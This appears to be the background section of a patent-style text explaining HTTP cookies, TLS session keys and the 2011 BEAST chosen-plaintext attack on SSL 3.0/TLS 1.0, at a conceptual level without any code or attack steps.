HyperText Transfer Protocol (HTTP) is a stateless protocol. To provide continuity for communications between an HTTP client and an HTTP server (also known as a web server), the HTTP client will store a cookie containing information set by the web server, and will include that information in a cookie header in subsequent HTTP requests to the web server. For example, the cookie header may include a session identifier.
Transport Layer Security (TLS) is the industry standard for exchange of data over a secure channel, used with online banking, e-commerce and payment sites, and also used as the underlying security for virtual private networks (VPNs). Initially, a TLS channel is established, using public key infrastructure (PKI) certificates for authentication and to generate at each end of the channel a shared secret to be used for encrypting communications over the TLS channel. Symmetric cryptographic techniques use the shared secret, known as a session key, to exchange data in a secure manner over the TLS channel.
Secure Sockets Layer (SSL) 3.0 and TLS 1.0 suffer from a known vulnerability, namely susceptibility to a chosen-plaintext attack described by W. Dai and others as early as 2002. Until recently, it was generally believed that a chosen-plaintext attack could not feasibly be carried out to attack HTTPS communications.
In September 2011, Juliano Rizzo and That Duong presented at the Ekoparty conference in Argentina an attack on TLS 1.0/SSL 3.0 that enables them to decrypt HTTPS client requests on the fly and hijack sessions between an HTTPS client and a web server. The attack uses a tool called BEAST (Browser Exploit Against SSL/TLS) that enables them to grab and decrypt HTTPS cookies from active user sessions, such as supposedly confidential sessions with sensitive sites such as online banking, e-commerce and payment sites (e.g. PayPal™). The tool uses what is known as a blockwise chosen-boundary attack against the Advanced Encryption Standard (AES) encryption algorithm that is used in TLS/SSL.